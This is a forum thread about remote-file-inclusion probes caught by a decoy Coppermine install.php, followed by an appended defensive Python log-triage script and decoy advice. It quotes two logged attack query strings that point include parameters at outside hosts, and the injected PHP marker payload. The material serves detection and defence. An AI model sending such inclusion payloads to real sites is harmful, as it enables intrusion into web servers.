Attack to CPG 1.4.x target "install.php"
 


Started by brix, August 27, 2010, 10:45:57 AM


brix

Hi all,

I know that after installation you must delete "install.php" for any CMS, but often that does not happen.

One of our users (an Italian website) has recently had attacks on the file "install.php", so I suggested removing it.

He did, and one of his staff created a fake "install.php" bait that keeps a log of the hacking attempts.

I hope it will be useful to know which attack is executed, and for that reason I paste the contents of the log created by the bait:

Log:

Sunday 15th of August 2010 09:09:59 AM - 146.83.237.120 - Mozilla/5.0 - mosConfig_absolute_path=http://www.songdosarang.org/skin/head??
Sunday 15th of August 2010 10:12:14 AM - 70.86.235.162 - Mozilla/5.0 - error=http://devilbat.fileave.com/zfxid1.txt?

Comment:

Caught!
It seems that finally the fish has taken the bait!
On that day in August there were a couple of intrusion attempts; the result is these two lines:
Sunday 15th of August 2010 09:09:59 AM - 146.83.237.120 - Mozilla/5.0 - mosConfig_absolute_path=http://www.songdosarang.org/skin/head??
Sunday 15th of August 2010 10:12:14 AM - 70.86.235.162 - Mozilla/5.0 - error=http://devilbat.fileave.com/zfxid1.txt?

The first IP is from Chile, on a university network, and the second from a U.S. hosting service; probably in both cases it is a botnet and the owners of the IPs are unaware and innocent.

Both attacks pass a link to a URL in the parameters sent to the Coppermine installer; by visiting that URL you get (as expected) the PHP string that they wanted to inject into this site:
<?php /**ZFxID**/ echo("Shiro"."Hige"); die("Shiro"."Hige"); /**ZFxID**/ ?>

If this thread is somewhat useful, I am pleased to have collaborated in the protection of Coppermine, with the help of our users. Thanks

brix

Sorry, I pushed the "solved" button but it is not :-(

Nibbler

That's a mambo exploit attempt. It won't do anything to Coppermine.
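A way to triage a bait log like the one brix pasted, as an added example that is not part of this thread and not Coppermine code: it parses lines in the "date - IP - user-agent - query" layout quoted above, flags every parameter whose value is itself a URL or PHP stream wrapper (the remote-file-inclusion pattern both logged hits show) and tags the Mambo/Joomla parameter Nibbler identifies. The first two sample lines copy the thread's entries; the third line, the 192.0.2.10 address and the KNOWN_PARAMS table are constructed for the example and are not from the post.

```python
"""Triage of a decoy install.php log: flag remote-file-inclusion (RFI) probes."""
import re
from urllib.parse import parse_qsl

# Constructed sample in the same "date - ip - user-agent - query" layout as the
# bait log quoted in the thread. The first two lines copy the post's entries;
# the third is a made-up benign hit from 192.0.2.10 (a documentation address).
SAMPLE_LOG = """\
Sunday 15th of August 2010 09:09:59 AM - 146.83.237.120 - Mozilla/5.0 - mosConfig_absolute_path=http://www.songdosarang.org/skin/head??
Sunday 15th of August 2010 10:12:14 AM - 70.86.235.162 - Mozilla/5.0 - error=http://devilbat.fileave.com/zfxid1.txt?
Sunday 15th of August 2010 11:00:00 AM - 192.0.2.10 - Mozilla/5.0 - lang=english&step=2
"""

# The IPv4 field anchors the split, so a user-agent that itself contains " - "
# does not shift the columns; the query is everything after the last " - ".
LINE_RE = re.compile(r"^(?P<ts>.+?) - (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) - (?P<rest>.*)$")

# A parameter value that is a URL (or a PHP stream wrapper) is the signature of
# an RFI probe against code that builds an include() path from that parameter.
# The trailing "?" in the logged values turns whatever the target script appends
# to the path into a query string of the attacker's URL, so the include still
# resolves to the remote file.
REMOTE_RE = re.compile(r"^(?:https?|ftps?|php|data)://", re.IGNORECASE)

# Parameter names tied to a specific product's include path. Only the one seen
# in the thread is listed; this table is an assumption to extend from your own
# logs, not an exhaustive signature set.
KNOWN_PARAMS = {
    "mosConfig_absolute_path": "Mambo/Joomla 1.0",
}


def parse_entry(line):
    """Split one bait-log line into (timestamp, ip, user_agent, query) or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ua, sep, query = m.group("rest").rpartition(" - ")
    if not sep:  # no query column at all: the whole remainder is the user-agent
        ua, query = query, ""
    return m.group("ts"), m.group("ip"), ua, query


def is_remote_include(value):
    """True when a parameter value points at a remote resource or stream wrapper."""
    return bool(REMOTE_RE.match(value.strip()))


def classify(query):
    """Return (param, url, product) for every parameter carrying a remote URL."""
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if is_remote_include(value):
            findings.append((name, value, KNOWN_PARAMS.get(name)))
    return findings


def analyze_log(text):
    """Run classify() over every parseable line; one dict per RFI indicator."""
    results = []
    for line in text.splitlines():
        entry = parse_entry(line)
        if entry is None:
            continue
        ts, ip, ua, query = entry
        for param, url, product in classify(query):
            results.append({"time": ts, "ip": ip, "ua": ua,
                            "param": param, "url": url, "product": product})
    return results


if __name__ == "__main__":
    for r in analyze_log(SAMPLE_LOG):
        tag = r["product"] or "generic include parameter"
        print(f'{r["ip"]}: RFI probe via "{r["param"]}" -> {r["url"]} [{tag}]')
```

Two points worth keeping in mind when running a decoy like the one described in the thread: the bait must only record the request (IP, user-agent, raw query or POST body) and must never include, evaluate or fetch any of the values it logs, otherwise the decoy becomes the vulnerability it is meant to observe; and the same classification can be run over the web server's ordinary access log, where the query string is already present, so a decoy file is not required to spot these probes. The fetched payload in the post (echo and die of "Shiro"."Hige") is the usual scanner marker: the attacking script looks for that string in the response to learn whether the inclusion succeeded.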